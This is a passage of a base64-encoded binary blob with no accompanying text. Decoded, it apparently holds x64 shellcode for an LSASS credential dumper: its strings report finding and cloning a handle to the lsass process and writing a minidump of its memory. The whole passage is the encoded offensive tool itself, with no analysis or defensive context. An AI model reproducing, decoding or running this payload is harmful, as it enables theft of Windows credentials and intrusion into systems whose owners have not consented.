FBQUFPdGN1QXNCQUFEclZiZ09BUUFBNjA2NEZBRUFBT3RIdUJjQkFBRHJRTGdaQVFBQTZ6bTRIUUVBQU9zeXVCOEJBQURySzdnaEFRQUE2eVM0SWdFQUFPc2R1Q01CQUFEckZyZ2pBUUFBNncrNEtBRUFBT3NJdUNnQkFBRHJBY05KaWNvUEJjTmxTSXNFSldBQUFBQ0R1QmdCQUFBR2RBNkR1QmdCQUFBS2RGRHBQd0VBQUlPNEhBRUFBQUYwSDRPNEhBRUFBQUlQaE00QUFBQ0R1QndCQUFBREQ0VElBQUFBNlJjQkFBQm1nYmdnQVFBQXNCMFBoSjhBQUFCbWdiZ2dBUUFBc1IwUGhKY0FBQURwOUFBQUFHYUJ1Q0FCQUFBQUtBK0VtQUFBQUdhQnVDQUJBQUJhS1ErRWtBQUFBR2FCdUNBQkFBQTVPQStFaUFBQUFHYUJ1Q0FCQUFEWE9nK0VnQUFBQUdhQnVDQUJBQUNyUDNSOFpvRzRJQUVBQU81Q2RIaG1nYmdnQVFBQVkwVjBkR2FCdUNBQkFBQzZSM1J3Wm9HNElBRUFBTHRIZEd4bWdiZ2dBUUFBWVVwMGFHYUJ1Q0FCQUFCaVNuUms2Mm00SGdBQUFPdGp1QjRBQUFEclhMZ2ZBQUFBNjFXNElBQUFBT3RPdUNFQUFBRHJSN2doQUFBQTYwQzRJUUFBQU9zNXVDRUFBQURyTXJnaEFBQUE2eXU0SVFBQUFPc2t1Q0VBQUFEckhiZ2hBQUFBNnhhNElRQUFBT3NQdUNFQUFBRHJDTGdoQUFBQTZ3SERTWW5LRHdYRFpVaUxCQ1ZnQUFBQWc3Z1lBUUFBQm5RT2c3Z1lBUUFBQ25SUTZUOEJBQUNEdUJ3QkFBQUJkQitEdUJ3QkFBQUNENFRPQUFBQWc3Z2NBUUFBQXcrRXlBQUFBT2tYQVFBQVpvRzRJQUVBQUxBZEQ0U2ZBQUFBWm9HNElBRUFBTEVkRDRTWEFBQUE2ZlFBQUFCbWdiZ2dBUUFBQUNnUGhKZ0FBQUJtZ2JnZ0FRQUFXaWtQaEpBQUFBQm1nYmdnQVFBQU9UZ1BoSWdBQUFCbWdiZ2dBUUFBMXpvUGhJQUFBQUJtZ2JnZ0FRQUFxejkwZkdhQnVDQUJBQUR1UW5SNFpvRzRJQUVBQUdORmRIUm1nYmdnQVFBQXVrZDBjR2FCdUNBQkFBQzdSM1JzWm9HNElBRUFBR0ZLZEdobWdiZ2dBUUFBWWtwMFpPdHB1QTBBQUFEclk3Z05BQUFBNjF5NERnQUFBT3RWdUE4QUFBRHJUcmdRQUFBQTYwZTRFQUFBQU90QXVCQUFBQURyT2JnUUFBQUE2eks0RUFBQUFPc3J1QkFBQUFEckpMZ1FBQUFBNngyNEVBQUFBT3NXdUJBQUFBRHJEN2dRQUFBQTZ3aTRFQUFBQU9zQncwbUp5ZzhGdzJWSWl3UWxZQUFBQUlPNEdBRUFBQVowRG9PNEdBRUFBQXAwVU9rL0FRQUFnN2djQVFBQUFYUWZnN2djQVFBQUFnK0V6Z0FBQUlPNEhBRUFBQU1QaE1nQUFBRHBGd0VBQUdhQnVDQUJBQUN3SFErRW53QUFBR2FCdUNBQkFBQ3hIUStFbHdBQUFPbjBBQUFBWm9HNElBRUFBQUFvRDRTWUFBQUFab0c0SUFFQUFGb3BENFNRQUFBQVpvRzRJQUVBQURrNEQ0U0lBQUFBWm9HNElBRUFBTmM2RDRTQUFBQUFab0c0SUFFQUFLcy9kSHhtZ2JnZ0FRQUE3a0owZUdhQnVDQUJBQUJqUlhSMFpvRzRJQUVBQUxwSGRIQm1nYmdnQVFBQXUwZDBiR2FCdUNBQkFBQmhTblJvWm9HNElBRUFBR0pLZEdUcmFiZ3pBQUFBNjJPNE13QUFBT3RjdURRQUFBRHJWYmcxQUFBQTYwNjROZ0FBQU90SHVEWUFBQURyUUxnMkFBQUE2em00TmdBQUFPc3l1RFlBQUFEcks3ZzJBQUFBNnlTNE5nQUFBT3NkdURZQUFBRHJGcmcyQUFBQTZ3KzROZ0FBQU9zSXVEWUFBQURyQWNOSmljb1BCY05sU0lzRUpXQUFBQUNEdUJnQkFBQUdkQTZEdUJnQkFBQUtkRkRwUHdFQUFJTzRIQUVBQUFGMEg0TzRIQUVBQUFJUGhNNEFBQUNEdUJ3QkFBQURENFRJQUFBQTZSY0JBQUJtZ2JnZ0FRQUFzQjBQaEo4QUFBQm1nYmdnQVFBQXNSMFBoSmNBQUFEcDlBQUFBR2FCdUNBQkFBQUFLQStFbUFBQUFHYUJ1Q0FCQUFCYUtRK0VrQUFBQUdhQnVDQUJBQUE1T0ErRWlBQUFBR2FCdUNBQkFBRFhPZytFZ0FBQUFHYUJ1Q0FCQUFDclAzUjhab0c0SUFFQUFPNUNkSGhtZ2JnZ0FRQUFZMFYwZEdhQnVDQUJBQUM2UjNSd1pvRzRJQUVBQUx0SGRHeG1nYmdnQVFBQVlVcDBhR2FCdUNBQkFBQmlTblJrNjJtNFBBQUFBT3RqdUR3QUFBRHJYTGc5QUFBQTYxVzRQZ0FBQU90T3VEOEFBQURyUjdnL0FBQUE2MEM0UHdBQUFPczV1RDhBQUFEck1yZy9BQUFBNnl1NFB3QUFBT3NrdUQ4QUFBRHJIYmcvQUFBQTZ4YTRQd0FBQU9zUHVEOEFBQURyQ0xnL0FBQUE2d0hEU1luS0R3WERaaTRQSDRRQUFBQUFBRUZYUVZaQlZVRlVWVmUvQUJBQUFGWk1pYzVUU0lIc0dBWUFBRW1MbVlBQUFBQk1pWVFrMkFFQUFJbVVKSmdCQUFCSWlZd2tvQUVBQUVqSGhDU1lBQUFBQUFBQUFNZUVKS0FBQUFBQUFBQUFTTWVFSkxBQkFBQUFBQUFBeDRRa3VBRUFBQUFBQUFCSXg0UWt3QUVBQUFBQUFBQkl4NFFreUFFQUFBQUFBQURIaENUUUFRQUFJZ2dBQUVqSGhDVG9BUUFBQUFBQUFFakhoQ1R3QVFBQUFBQUFBRWpIaENUNEFRQUFBQUFBQUVqSGhDUUFBZ0FBQUFBQUFNZUVKT0FCQUFBQUFBQUFRZitSaUFBQUFFRzRBQkFBQURIU1NJbkIvOU5JaWNOSWhjQjFOK25EQ2dBQVppNFBINFFBQUFBQUFFaUxycGdBQUFBQi8vK1dpQUFBQUVtSjJFR0orVEhTU0luQi85VklpY05JaGNBUGhKRUtBQUJGTWNsQmlmaElpZHE1QlFBQUFPai8rLy8vUFFRQUFNQjB2b1hBRDRWWUNnQUFpNHdrbUFFQUFFaUoyamxMVUErRlB3b0FBSXQ2QkVpTHJvQUFBQUNKdkNTNEFRQUEvNWFJQUFBQVRJMEVmekhTU0luQlNjSGdBdi9WU0ltRUpMQUJBQUJJaGNBUGhBNEtBQUJJaTc2UUFBQUFTSTJzSkJBQ0FBQk1qYXdrOEFBQUFQK1dpQUFBQUVtSjJESFNUSTJrSkxBQUFBQklpY0c3QVFBQUFQL1hTSTJNSkpBQkFBQklpZkpJamJ3a2hBQUFBT2dBRlFBQWk1UWs0QUVBQUVVeHlVVXh3RWk0VFVSTlVKT25BQUJJaTR3azJBRUFBTWVFSk9BQUFBQUFBQUFBU0ltRUpOQUFBQUJJdUFRQUFBQWdBQUFBU0ltRUpOZ0FBQUJJeDRRazZBQUFBQ0lJQUFEL2xxQUFBQUJJaVhRa0lFbUo2VWlMakNUWUFRQUFRYmdnQUFBQVNJMlVKTkFBQUFEb1p3c0FBSXVFSk9BQkFBQk1pZW5IaENTa0FBQUFCd0FBQUlQQVVJbUVKT0FCQUFDSmhDU3NBQUFBLzVhd0FBQUF1bXdBQUFCSXVHNTBaR3hzTG1Sc3VYSnpBQUJJaVlRa2pBQUFBRWk0VW5Sc1IyVjBUblJtaVpRa2xBQUFBRWk2Vm1WeWMybHZiazVJaVlRa3NBQUFBRWlOaENTTUFBQUFTSW1VSkxnQUFBQm1pWXdreEFBQUFFaUp3Y2VFSk1BQUFBQjFiV0pseG9Ra3hnQUFBQUJJaVVRa1VQK1dxQUFBQUV5SjRrbUp4a2lKd2YrVzBBQUFBRWlKK2tpSmZDUm9USTJFSklnQUFBQk1pVVFrTUVpTmpDU0FBQUFBLzlCTWlmRkZNZmFCcENTSUFBQUEvLzhBQVArV3VBQUFBQSszaENUd0FBQUF4b1FrSndFQUFBSEhoQ1EwQVFBQUFnQUFBR2FKaENRZ0FRQUFpNFFrSEFFQUFNZUVKRHdCQUFBUUFBQUFpWVFrSWdFQUFJdUVKQkFCQUFCSXg0UWtRQUVBQUFBQUFBQ0loQ1FtQVFBQWk0UWtnQUFBQUVqSGhDUklBUUFBQUFBQUFJbUVKQ2dCQUFDTGhDU0VBQUFBaVlRa0xBRUFBSXVFSklnQUFBQ0poQ1F3QVFBQWk0UWs0QUVBQUlQQU9JbUVKRGdCQUFCRWlmSC9sc0FBQUFDRndIUVJTSW5ZUklueFNOUGdTQW1FSkVBQkFBQkJnOFlCUVlQK1FIWFlpNVFrNEFFQUFFVXh5VVV4d0VpSjcwaUxqQ1RZQVFBQVNJMWNKSGovbHFBQUFBQklpWFFrSUVtSjZVaU5oQ1FnQVFBQVNJdU1KTmdCQUFCSWljSkJ1RGdBQUFCSWlVUWtRT2hxQ1FBQU1jQzVRQUFBQUlPRUpPQUJBQUE0ODBpclNJbnAvNWJJQUFBQVNJbDBKQ0JJalZRa2ZFaUxqQ1RZQVFBQUFjQkppZGxCdUFRQUFBQ0pSQ1I4NkNrSkFBQklpWFFrSUVtSjJVaUo2a1NMUkNSOFNJdU1KTmdCQUFEb0RBa0FBSXRFSkh4Rk1jbEZNY0FEaENUZ0FRQUFpNVFrM0FBQUFNZUVKS2dBQUFBNEFBQUFnOEFFU0l1TUpOZ0JBQUNKaENUZ0FRQUEvNWFnQUFBQVNJbDBKQ0JKaWVsSWpZUWtwQUFBQUVpTGpDVFlBUUFBU0luQ1FiZ01BQUFBU0lsRUpFam9wZ2dBQUl1RUpPQUJBQUNMakNUSUFRQUF4NFFrcEFBQUFBUUFBQUNKUkNSZ2lZUWtyQUFBQUlYSkQ0UlVDQUFBZytrQlNJdVVKTUFCQUFCSWFja29BZ0FBU0luUVRJMkVDaWdDQUFBeHlROGZBSU00QVlQUkFFZ0ZLQUlBQUV3NXdIWHZhOGxzUlRIMlRJbGtKRmhNamJ3a0ZBSUFBTWVFSklRQUFBQUFBQUFBUlluMGpVRUVpMHdrWUluSGlVUWtaSW5JQWZoSWpid2tPQUVBQUltRUpPQUJBQUNOUVFTSlJDUTg2dzBQSDBRQUFFaUxsQ1RBQVFBQVJJbmpTR25iS0FJQUFFaU5EQnFMQVlYQUQ0VWhBZ0FBU0lQQkhQK1d5QUFBQUVpTGxDVEFBUUFBVEluNWpVUUFBa2dCMm9tRUpCQUNBQUJJZzhJYy81WUFBUUFBaTVRazRBRUFBRVV4eVVVeHdFZ0RuQ1RBQVFBQVNJdU1KTmdCQUFCSWkwTUlTSW1FSkNBQkFBQ0xReENKaENRb0FRQUFpME1ZaVlRa0xBRUFBSXRERkl1Y0pCQUNBQUNKbENRMEFRQUFpWVFrTUFFQUFJMUQvb1BEQkltRUpCQUNBQUQvbHFBQUFBQkJpZGhOaWVsSWllcElpWFFrSUVpTGpDVFlBUUFBNkNnSEFBQUJuQ1RnQVFBQVRJbjVTSXRVSkRESGhDU3dBQUFBWEFBQUFFakhCd0FBQUFCSXgwY0lBQUFBQUVqSFJ4QUFBQUFBU01kSEdBQUFBQUJJeDBjZ0FBQUFBRWpIUnlnQUFBQUF4MGN3QUFBQUFQK1c2QUFBQUluRGhjQVBoSklBQUFCTWk3YUFBQUFBLzVhSUFBQUFRWW5ZTWRKSWljRkIvOVpKaWNaSWhjQjBjb3VVSklnQUFBQkppY0ZCaWRoTWlmbi9sdkFBQUFDRndIUkJUSXRNSkZCSWkxUWtXRTJKNkV5SjhmK1crQUFBQUlYQWRDZUR2Q1NNQUFBQU5FRzROQUFBQUVpTGxDVHdBQUFBU0luNVJBOUdoQ1NNQUFBQVJZbkEveFpJaTU2UUFBQUEvNWFJQUFBQVRZbndNZEpJaWNILzA0dUVKSVFBQUFDTFRDUThSVEhKUlRIQVNNZUVKR3dCQUFBQUFBQUFTTWVFSkhRQkFBQUFBQUFBalZBQmE4QnNpWlFraEFBQUFFakhoQ1I4QVFBQUFBQUFBRWpIaENTRUFRQUFBQUFBQUkwVUNFaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrUUUySjZVaUxqQ1RZQVFBQVFiaHNBQUFBNkxjRkFBQkJnOFFCUkR1a0pNZ0JBQUFQZ3EzOS8vOU1pMlFrV0l0VUpHQkZNY2xGTWNBeDIwaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrYUUySjZVaUxqQ1RZQVFBQVFiZ0VBQUFBNkdZRkFBQ0xSQ1JrUlRISlJUSEFTSXVNSk5nQkFBQ0poQ1NvQUFBQWk0UWszQUFBQUkxUURQK1dvQUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9nZEJRQUE2eGNQSHdCTUFmTVBndk1BQUFCSWk1d2tFQUlBQUV3QjgwaUxqQ1NnQVFBQVFia3dBQUFBU1lub1NJbmEvNWJZQUFBQVNJWEFENFRGQUFBQWdid2tNQUlBQUFBUUFBQk1pN1FrS0FJQUFIVzBUSXU4SlBnQkFBQklpN3drRUFJQUFFMkYvdytFT2dRQUFJdUVKQUFDQUFDTGxDUUVBZ0FBT2RBUGdod0VBQUJNaTVhWUFBQUFBZEtKbENRRUFnQUFpVlFrUEV5SlZDUXcvNWFJQUFBQVJJdE1KRHhOaWZneDBreUxWQ1F3U0luQlNjSGhCRUgvMGttSngwaUpoQ1Q0QVFBQVRZWC9ENFFTQkFBQWk0UWtBQUlBQUVpTGpDUW9BZ0FBaWNLRHdBRkl3ZUlFU1FIWFRZbDNDRW1Kemt3QjgwbUpQNG1FSkFBQ0FBQVBndzMvLy8rTGhDUUFBZ0FBaTVRazRBRUFBRVV4eVVVeHdNZUVKS1FBQUFBSkFBQUFqVWdCU0ltRUpQQUFBQUNKejRtVUpLd0FBQUJJaTR3azJBRUFBTUhuQkkwRU9vbDhKR0JJaVlRaytBQUFBUCtXb0FBQUFFaUpkQ1FnVElucVNZbnBTSXVNSk5nQkFBQkJ1QWdBQUFCRk1lM29xQU1BQUl1RUpPQUJBQUJGTWNsRk1jQklpNHdrMkFFQUFJMVFDSW1VSk9BQkFBRC9scUFBQUFCSWlYUWtJRW1KNlVpTGpDVFlBUUFBU0kyVUpQZ0FBQUJCdUFnQUFBRG9ZQU1BQUl1RUpPQUJBQUNOZUFpTGhDUUFBZ0FBaVh3a1BFR0p4a0hCNWdSQkFmNUVpYlFrNEFFQUFJWEFENFNnQVFBQVJJbHNKREJJaTN3a1VBOGZnQUFBQUFCRWkzd2tNRVV4eVVVeHdFVXg3VWlMaENUNEFRQUFTSXVNSk5nQkFBQkp3ZWNFVEFINFNJc1FTSXRBQ0VpSmxDUWdBUUFBVElueVNJbUVKQ2dCQUFEL2x1QUFBQUJJaTRRaytBRUFBRXdCK0VpTFdBaEloZHQxSnVuU0FBQUFacEJJaTRRaytBRUFBRW1CeFFBRUFBQk1BZmhJaTFnSVREbnJENGF4QUFBQVNZblpSQ25yVFNucFNZSDUvd01BQUhZTFFia0FCQUFBdXdBRUFBQklpeEJNaVdRa0lFbUo2RWlMakNTZ0FRQUFTTWVFSkxBQUFBQUFBQUFBVEFIcTZEM3ovLytGd0hXWlNJbDBKQ0JKaWZsQmlkaElpZXBJaTR3azJBRUFBT2crQWdBQTZYbi8vLzltRHgrRUFBQUFBQUJJQWNJNVNsQVBoTUgxLy8rTEFvWEFkZTVJaTc2UUFBQUEvNWFJQUFBQVNZbllNZEpJaWNILzF6SEFTSUhFR0FZQUFGdGVYMTFCWEVGZFFWNUJYOE9RaTF3a1BFaUxqQ1RZQVFBQVJUSEpSVEhBVEFPMEpDZ0JBQUNKMm9QREVQK1dvQUFBQUVpSmRDUWdTSXRVSkVCTmllRklpNHdrMkFFQUFFRzRFQUFBQU9pckFRQUFnMFFrTUFHTFJDUXdpVndrUER1RUpBQUNBQUFQZ25IKy8vK0xSQ1JnU0l1TUpOZ0JBQUJGTWNsRk1jQ0poQ1NvQUFBQWk0UWszQUFBQUkxUUdQK1dvQUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9oSUFRQUFpNFFrM0FBQUFFVXh5VVV4d0VpTGpDVFlBUUFBalZBay81YWdBQUFBU0lsMEpDQklpNHdrMkFFQUFFbUo2VWlObENTWUFBQUFRYmdNQUFBQTZBY0JBQUJJaTd3azZBRUFBRWlMbnBBQUFBRC9sb2dBQUFBeDBrbUorRWlKd2YvVFNJdThKUGdCQUFCSWk1NlFBQUFBLzVhSUFBQUFNZEpKaWZoSWljSC8wMGlMdkNUQUFRQUFTSXVla0FBQUFQK1dpQUFBQURIU1NZbjRTSW5CLzlOSWk3d2tzQUVBQUVpTG5wQUFBQUQvbG9nQUFBQXgwa2lKd1VtSitQL1R1QUVBQUFEcGZQNy8vMHlKOGVrMy9QLy9USXUrZ0FBQUFNZUVKQVFDQUFBZ0FBQUEvNWFJQUFBQVFiZ0FBZ0FBTWRKSWljRkIvOWRKaWNkSWlZUWsrQUVBQUUyRi93K0Y3dnYvLzBqSGhDUUFBZ0FBQUFBQUFFeUx0Q1FvQWdBQTZRNzcvLytMUkNSZ3gwUWtaQVFBQUFESGhDU0VBQUFBQUFBQUFJUEFCSW1FSk9BQkFBRHBZUHIvLzBGV1RZbk9RVlZKaWMxQlZGVlhTSW5YVmxORWljTklnK3d3VEl1a0pKQUFBQUJKaTdRa2dBQUFBRUgvbENTSUFBQUFNZEpKaWRoSWljSC8xa2lGd0ErRWd3QUFBRWlKM1VpSnhvWGJkQzB4d0E4ZmdBQUFBQUFQdGhRSGlCUUdTSVBBQVVnNXczWHdTSW53U0FIelpwQ0FNRUZJZzhBQlNEbkRkZlJCaWVoSWlmSk1pZWxOaWZGSXgwUWtJQUFBQUFCQi8xUWtlRW1MbkNTUUFBQUFRZitVSklnQUFBQklnOFF3U1lud01kSklpY0ZJaWRoYlhsOWRRVnhCWFVGZS8rQVBINEFBQUFBQVNJUEVNRnRlWDExQlhFRmRRVjdEa0pDUWtKQ1FrSkNRUVZjeHdFRldRVlZCVkZWWFZraUp6cmtlQUFBQVUwaUI3RmdIQUFCSWpid2tRQUVBQUV5SmhDU3dCd0FBODBpcnVSNEFBQUJJeDBRa1lBQUFBQUJJeDBRa2FBQUFBQURIaENTd0FBQUFNQUFBQUVqSGhDUzRBQUFBQUFBQUFNZUVKTWdBQUFBQUFBQUFTTWVFSk1BQUFBQUFBQUFBeHdjQUFBQUFTSTI4SkZBQ0FBRHpTS3RJdUZBQWNnQnZBR01BU01lRUpOQUFBQUFBQUFBQVNJbUVKSUFBQUFCSXVHVUFjd0J6QUFBQVNJbUVKSWdBQUFDNGN3QUFBRWpIaENUWUFBQUFBQUFBQUVqSFJDUndBQUFBQUVqSFJDUjRBQUFBQUVqSGhDUXdBUUFBQUFBQUFFakhoQ1E0QVFBQUFBQUFBRWpIaENSQUFnQUFBQUFBQUVqSGhDUklBZ0FBQUFBQUFNY0hBQUFBQU1kRUpGcHNjMkZ6Wm9sRUpGNkxEb1hKRDRTVkF3QUFpZFZOaWN3eDIwVXgvMFV4OXVzT0R4OEFnOE1CT1I0UGhqMERBQUNKMzRYdGRBcElqUVIvT1d6R0NIWGxTSTBFZjR0RXhoZzlBQUFRQUErVndUMkpBUklBRDVYQ2hORjB5U1gvLy9mL1BaOEJFZ0IwdlUyRjluUVFRYmdBZ0FBQU1kSk1pZkZCLzFRa09FaU5CSDlJalV3a2FMcEFCQUFBU01kRUpIZ0FBQUFBVEkwc3hreU5UQ1J3UVl0RkNFeU5oQ1N3QUFBQVNJbEVKSERvUE9mLy8wRVB0MVVPeDBRa01BQUFBQUJNalV3a1lNZEVKQ2dBQUFBQVNJdE1KR2hKeDhELy8vLy94MFFrSUJBRUFBRG9QZVQvLzBHNUJBQUFBRUc0QUJBQUFESEp1Z0FRQUFCQi8xUWtTRW1KeGtpRndBK0VHLy8vLzBpTFRDUmdRYmtBRUFBQVNZbkF1Z0lBQUFCSXgwUWtJQUFBQUFEbzl1ci8vNFhBRDRqeS92Ly9TWXRPQ0VpTmxDU0FBQUFBUWY5VUpGQ0Z3QStGMmY3Ly8waU52Q1F3QVFBQU1kSklpMHdrWUVHNUJBRUFBRW1KK0VIL1ZDUmdoY0FQaExUKy8vOUlqWVFrUUFJQUFFaUxUQ1JvUWJnRUFRQUFTSWxFSkVoSWljSkIvMVFrYUlYQUQ0U00vdi8vU0kxVUpGcElpZmxCLzFRa1dFaUZ3QStFZHY3Ly8wSDNSUmdRQkFBQUQ0Um8vdi8vU0l0TUpFaElqYndrWUFNQUFFeU52Q1JRQlFBQVFmOVVKSEM1UGdBQUFFeUxSQ1J3U0xwa0lHRnVaQ0J6ZFVtSndVaTRXeXRkSUVadmRXNUlpWlFrNkFBQUFFaTZiSGtnWTJ4dmJtVklpWVFrNEFBQUFFaTRZMk5sYzNObWRXeElpWVFrOEFBQUFFaTRaQ0JvWVc1a2JHVklpWVFrQUFFQUFFaTRJR3h6WVhOeklHbElpWVFrRUFFQUFFaTRDVnNyWFNCSVlXNUlpWVFra0FBQUFFaTRkSE02SUNWNENnQklpWVFrb0FBQUFESEE4MGlyU0ltVUpQZ0FBQUJJamJ3a1lBVUFBRWk2SUNnbFpDa2dkRys1UGdBQUFFaUpsQ1FJQVFBQVNMcHVPaUFsY3lBb0pmTklxMGlKbENRWUFRQUFTSTI4SkZBREFBQkl1bVJzWlNCU2FXZG9TSW1VSkpnQUFBQklpZmxJalpRazRBQUFBRXlKUkNRZ3g0UWtJQUVBQUdRcENnQkl4NFFrVUFNQUFBQUFBQUJJeDRRa1dBTUFBQUFBQUFCSXg0UWtVQVVBQUFBQUFBQkl4NFFrV0FVQUFBQUFBQUJCLzFRa0dFV0xSUmhNaWZsSWpaUWtrQUFBQUVIL1ZDUVlTSXVNSkxBSEFBQklpZnBCLzFRa0NFeUora2lMakNTd0J3QUFRZjlVSkFoTWkzd2tZSVh0ZFZsTWlmbUR3d0ZCLzFRa0tEa2VENGZKL1AvL1pnOGZSQUFBU0l0TUpHaEloY2wwQlVIL1ZDUW9UWVgyZEJCQnVBQ0FBQUF4MGt5SjhVSC9WQ1E0U0lIRVdBY0FBRXlKK0Z0ZVgxMUJYRUZkUVY1Qlg4TkZNZi9yNUVpTFRDUm9TSVhKZGNEcnlKQ1FrSkJCVjBtSjEwRldUWW5HUVZWQmljMU1pY2xCVkZOTWljdElnZXl3QUFBQTZPd0xBQUJJaGNBUGhGTUJBQUJFaWVwSmlkbE5pZmhJaWNGSmljVG83L3IvLzBtSnhVaUZ3QStFa3dJQUFFaTRXeXBkSUU1dmR5Qk1pZm5HUkNSaUFFaTZkSEo1YVc1bklIUklpVVFrUUVpNGJ5QmtkVzF3SUd4SWlWUWtTRWk2YzJGemN5QXVMaTVJaVVRa1VMZ2dDZ0FBU0lsVUpGaElqVlFrUUdhSlJDUmcvMU1JVElueFJUSEpSVEhBU01kRUpEQUFBQUFBdWdBQUFFREhSQ1FvZ0FBQUFNZEVKQ0FDQUFBQS8xTWdTWW5HU0lQNC93K0VGZ0VBQUV5SjZmOVRNRW1KMlUySjhFeUo2WW5DNkxEci8vK0Z3QStFZUFFQUFFaTRXeXRkSUV4ellYTk1pZmxJdW5NZ1pIVnRjQ0JweDRRa2lBQUFBSFJsQ2dCSWlVUWtjRUcvQVFBQUFFaTRjeUJqYjIxd2JHVklpVlFrZUVpTlZDUndTSW1FSklBQUFBRC9Vd2hOaGZaMEJreUo4ZjlUS0V5SjZmOVRLRUc0QUlBQUFESFNUSW5oLzFNNFNJSEVzQUFBQUVTSitGdEJYRUZkUVY1Qlg4Tm1EeCtFQUFBQUFBQkl1RnN0WFNCR1lXbHNUSW41U0xwbFpDQjBieUJuWmNlRUpKQUFBQUJzWlhNS1NJbEVKSEJGTWY5SXVIUWdZU0JzYVhOMFNJbFVKSGhJdWlCdlppQm9ZVzVrU0ltVUpJZ0FBQUJJalZRa2NFaUpoQ1NBQUFBQXhvUWtsQUFBQUFEL1V3anBlLy8vL3c4ZmhBQUFBQUFBU0xoYkxWMGdRMjkxYkV5SitVaTZaQ0J1YjNRZ2QzTEhoQ1NZQUFBQWFXeGxDa2lKUkNSd1JUSC9TTGhwZEdVZ2RHOGdjMGlKVkNSNFNMcHdaV05wWm1sbFpFaUpoQ1NBQUFBQVNMZ2diM1YwY0hWMFpraUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBTWFFSkp3QUFBQUEvMU1JNmQvKy8vOW1EeDlFQUFCSXVGc3RYU0JUYjIxbFRJbjVSVEgvU0xwMGFHbHVaeUIzWlVpSlJDUndTTGh1ZENCM2NtOXVaMGlKVkNSNFNMb2dkMmhwYkdVZ1pFaUpoQ1NBQUFBQVNMaDFiWEJwYm1jS0FFaUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBUDlUQ09sdC92Ly9aZzhmaEFBQUFBQUFTTGhiTFYwZ1EyOTFiRXlKK1VpNlpDQnViM1FnWm1uSGhDU2dBQUFBYVdRS0FFaUpSQ1J3UlRIL1NMaHVaQ0JoY0hCeWIwaUpWQ1I0U0xwd2NtbGhkR1VnYUVpSmhDU0FBQUFBU0xoaGJtUnNaU0JwYmtpSmxDU0lBQUFBU0xvZ1oybDJaVzRnY0VpSmxDU1lBQUFBU0kxVUpIQklpWVFra0FBQUFQOVRDT254L2YvL2tKQ1FrSkNRa0pDUWtKQ1FRVmU0cUJVQUFFRldRVlZCVkZWWFZsUG9hdHovLzBHNEFCQUFBRWdweEVtSnpESEF1UUFDQUFCSWpid2tvQVVBQUVpTm5DU2dBUUFBU0luVlNNZEVKSEFBQUFBQTgwaXJ1VUFBQUFCSWlkOU1qYlFrb0FNQUFQTklxMHlKOTdsQUFBQUFTSTIwSktBRkFBRHpTS3RNalV3a1pFaUo4a21MVENRUVNNZEVKSGdBQUFBQVNNZUVKSUFBQUFBQUFBQUF4MFFrWkFBQUFBRC9sUkFCQUFDTFJDUmtTSTJNSkpBQUFBQklpVXdrT01Ib0E0bEVKR1FQaElJQkFBQk1qWHdrY0RIL1RJbjRUWW4zU1luR0R4OUFBRW1MVENRUVNJc1dRYmtZQUFBQVRZbncvNVVZQVFBQWhjQVBoRDRCQUFCSmkwd2tFRWlMRmtHNUFBRUFBRW1KMlArVklBRUFBSVhBRDRRZkFRQUFTTGd1QUhNQWJ3QUFBRWlKMmNlRUpKZ0FBQUErQUFBQVNJbEVKR2hJdUR3QVpRQnNBR1lBU0ltRUpKQUFBQUQvbGNnQUFBQkltRXlOREVOSmpWSCtTRG5hY3gvcHZnSUFBR1lQSDRRQUFBQUFBSVA0TDNRVVNJMUMva2c1MkhJUFNJbkNEN2NDZy9oY2RlZElnOElDU1NuUnVmOEFBQUJCdVA4QUFBQk5pYzFNaVV3a0tFblIvVW1CK2Y4QkFBQk1EMGZwVEluNVM0MUVMUUJJaVVRa1FFd0IrRWlKUkNRdy8xVUFTSXRFSkRCTWkwd2tLREhKWm9rSVNZUDVDQStIaGdBQUFFbUQrUVlQaDVVQUFBQk1pZnJyQ3c4ZmdBQUFBQUJJZzhJQ0Q3Y0NSSTFBdjQxSUlHWkJnL2dhRDBMQlpva0Nab1hBZGVKTWkyd2tjSXRFSkhoSmkwd2tFRXlMUkNRNFRJbnFpVVFrS09nTERRQUFoY0FQaFpNQUFBQ0R4d0ZJZzhZSU9Yd2taQStIa3Y3Ly8waUJ4S2dWQUFCYlhsOWRRVnhCWFVGZVFWL0RaZzhmUkFBQVNZbm9USW5xVEluNTZOb0pBQUJJbUVpRndBK0ZQd0VBQUVpTFJDUkFTSTFVSkdoSmpVd0grditWS0FFQUFJWEFENFZPLy8vL1NZMVYvVW1KNkV5SitlaWpDUUFBU0poSWhjQVBoRFQvLy85SktjVklpMVFrT0V1TlRHLzYvNVVBQVFBQTZSei8vLytMaENUb0FBQUFUWXRFSkRDSlJDUXdpNFFrbUFBQUFJbEVKRUJOaGNBUGhPUUFBQUJCaTBRa09FR0xWQ1E4T2RCeVZVeUxuWmdBQUFBQjBreUpSQ1JZUVlsVUpEeUpWQ1JVVElsY0pFai9sWWdBQUFDTFZDUlVUSXRFSkZoTWkxd2tTRWlKd1V4cHlpZ0NBQUF4MGtILzAwbUp3RW1KUkNRd1RZWEFENFRGQUFBQVFZdEVKRGhJYWNBb0FnQUFTWXRNSkJCTWllcEJ1UVFCQUFCTmpVUUFIUCtWQ0FFQUFFR0xSQ1E0aTB3a0tFaUp3a2hwd0NnQ0FBQkpBMFFrTUlsSUVJdE1KRUNEd2dGTWlXZ0lpVWdVaTB3a01NY0FBQUFBQUlsSUdFR0pWQ1E0NlliKy8vOW1EeCtFQUFBQUFBQkpLY1V4MG1aQ2laUnNvQU1BQU9rWi92Ly9EeDlFQUFCQngwUWtQQ0FBQUFCTWk0MkFBQUFBVElsTUpFai9sWWdBQUFCQnVBQkZBQUJNaTB3a1NESFNTSW5CUWYvUlNZbkFTWWxFSkRCTmhjQVBoVHYvLy85SngwUWtPQUFBQUFEcEdQNy8vMEc0L3dBQUFFeUp5a3lKK2Y5VkFESEFab21FSktBREFBRHBxZjMvLzVDUWtKQ1FrSkNRa0pDUWtKQkJWYnA4WWZST1FWUkppY3k1WTlkUDVsZElnZXhRQWdBQTZJSUNBQUJJaGNBUGhIc0JBQUJKaWNDNExnQUFBRWlOZkNSQXVSNEFBQUJtaVVRa0xqSEFRUSsyRkNUelNLdTVIZ0